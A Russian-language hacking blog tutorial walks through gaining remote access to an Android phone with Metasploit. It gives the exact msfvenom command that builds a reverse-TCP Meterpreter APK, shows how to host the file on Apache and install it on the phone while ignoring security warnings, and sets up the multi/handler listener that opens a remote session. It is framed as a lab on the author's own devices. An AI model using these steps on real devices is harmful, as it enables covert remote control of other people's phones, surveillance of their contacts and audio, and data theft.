#2 Хакинг Android — Получение доступа к Android с помощью Meterpreter.
Здравствуйте, дорогие друзья.
Давайте взломаем нашу машину на Android с помощью пэйлоада, который мы создадим, используя MSFVenom. Это будет нашей первой атакой на девайс.
Для реализации данной атаки нам понадобятся две машины – это Kali Linux, и Android. Первое, что мы сделаем – это проверим ip-адрес машины на Kali, с помощью команды «ifconfig»:
![ifconfig](https://timcore.ru/wp-content/uploads/2021/05/screenshot_1-15.png)
Зная ip-адрес, мы сможем сгенерировать пэйлоад для Aндройд-девайса.
Перейдем на Рабочий стол Kali:
![перейдем на рабочий стол кали линукс](https://timcore.ru/wp-content/uploads/2021/05/screenshot_2-15.png)
Далее, запустим MSFVenom, где команда будет выглядеть как: «msfvenom–pandroid/meterpreter/reverse_tcpLHOST=192.168.0.127 LPORT=5555 –o shell.apk»:
![msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.127 LPORT=5555 –o shell.apk](https://timcore.ru/wp-content/uploads/2021/05/screenshot_3-15.png)
Жмем клавишу «Enter», и начинаем процесс генерации пэйлоада:
![Жмем клавишу «Enter», и начинаем процесс генерации пэйлоада](https://timcore.ru/wp-content/uploads/2021/05/screenshot_4-15.png)
Попутно запустим веб-сервер «Apache», с помощью команды: «sudo service apache2 start»:
![sudo service apache2 start](https://timcore.ru/wp-content/uploads/2021/05/screenshot_5-16.png)
Теперь нам необходимо перенести сгенерированный пэйлоад с рабочего стола в директорию веб-сервиса. Команда будет выглядеть как: «mv shell.apk /var/www/html/»:
![mv shell.apk /var/www/html/](https://timcore.ru/wp-content/uploads/2021/05/screenshot_6-15.png)
Проверим, все ли мы правильно сделали, перейдя в директорию веб-сервера:
![Проверим, все ли мы правильно сделали, перейдя в директорию веб-сервера](https://timcore.ru/wp-content/uploads/2021/05/screenshot_7-11.png)
Следующим шагом нам нужно будет запустить Metasploit Framerwork, с помощью команды: «msfconsole»:
![Следующим шагом нам нужно будет запустить Metasploit Framerwork, с помощью команды: «msfconsole»](https://timcore.ru/wp-content/uploads/2021/05/screenshot_8-9.png)
Переходим в наш Андройд-девайс, запустив Гугл Хром, для того, чтобы перейти по адресу нашего веб-сервера на Kali:
![переходим по адресу веб-сервера на андройде](https://timcore.ru/wp-content/uploads/2021/05/screenshot_9-6.png)
Теперь нам нужно загрузить шелл на Андройд. Переходим по адресу: «192.168.0.127/shell.apk»:
![192.168.0.127/shell.apk](https://timcore.ru/wp-content/uploads/2021/05/screenshot_10-5.png)
Жмем кнопку «Ok», и скачиваем файл:
![Жмем кнопку «Ok», и скачиваем файл](https://timcore.ru/wp-content/uploads/2021/05/screenshot_11-3-1024x369.png)
Далее щелкаем по кнопке «Open», и у нас появляется всплывающее окно с правами доступа в операционной системе (например, доступ к записи аудио и доступу к контактам):
![Далее щелкаем по кнопке «Open», и у нас появляется всплывающее окно с правами доступа в операционной системе (например, доступ к записи аудио и доступу к контактам)](https://timcore.ru/wp-content/uploads/2021/05/screenshot_12-3.png)
Жмем кнопку «Next», и у нас появляются дополнительные опции доступа:
![Жмем кнопку «Next», и у нас появляются дополнительные опции доступа](https://timcore.ru/wp-content/uploads/2021/05/screenshot_13-3.png)
Кликаем по кнопке «Install», и производится инсталляция. Через некоторое время мы получаем дополнительное всплывающее окно, где жмем кнопку «Install Anyway»:
![Через некоторое время мы получаем дополнительное всплывающее окно, где жмем кнопку «Install Anyway»](https://timcore.ru/wp-content/uploads/2021/05/screenshot_14-3.png)
И это последний шаг установки шелла. Снова появляется предупреждение, которое мы игнорируем:
![И это последний шаг установки шелла. Снова появляется предупреждение, которое мы игнорируем](https://timcore.ru/wp-content/uploads/2021/05/screenshot_15-2.png)
Щелкаем по кнопке «Don’t Send», и далее пока не открываем пэйлоад:
![Щелкаем по кнопке «Don’t Send», и далее пока не открываем пэйлоад](https://timcore.ru/wp-content/uploads/2021/05/screenshot_16-1.png)
Переходим в терминал Kali Linux, с уже открытым инструментом Metasploit Framework. Нам нужно настроить прослушиватель подключения.
Это делается в несколько шагов. Первая команда: «use exploit/multi/handler»:
![use exploit/multi/handler](https://timcore.ru/wp-content/uploads/2021/05/screenshot_17-1.png)
Далее выбираем пэйлоад с помощью команды: «set payload android/meterpreter/reverse_tcp»
![set payload android/meterpreter/reverse_tcp](https://timcore.ru/wp-content/uploads/2021/05/screenshot_18-1.png)
Далее прописываем хост и порт для приема соединения:
![Далее прописываем хост и порт для приема соединения](https://timcore.ru/wp-content/uploads/2021/05/screenshot_19-1.png)
Прописываем команду «run», в машине на Андройд жмем кнопку «Open»:
![Прописываем команду «run», в машине на Андройд жмем кнопку «Open»](https://timcore.ru/wp-content/uploads/2021/05/screenshot_20-1.png)
В Андройд-девайсе ничего не происходит, но если мы перейдем в Kali Linux, то увидим открывшуюся сессию Meterpreter-a:
![В Андройд-девайсе ничего не происходит, но если мы перейдем в Kali Linux, то увидим открывшуюся сессию Meterpreter-a](https://timcore.ru/wp-content/uploads/2021/05/screenshot_21-1.png)
Можем поиграться, и посмотреть пользователя, под которым мы находимся в системе. Это команда «getuid»:
![getuid](https://timcore.ru/wp-content/uploads/2021/05/screenshot_22-1.png)
С помощью команды «help», можно увидеть список команд, которые можно использовать на Андройде:
![С помощью команды «help», можно увидеть список команд, которые можно использовать на Андройде](https://timcore.ru/wp-content/uploads/2021/05/screenshot_23-1.png)
Покопайтесь в командах. Здесь можно найти много всего интересного.
На этом все. Всем хорошего дня!
Ага, остаётся только дебила найти, который подтвердит на смартфоне игнорируя все предложения.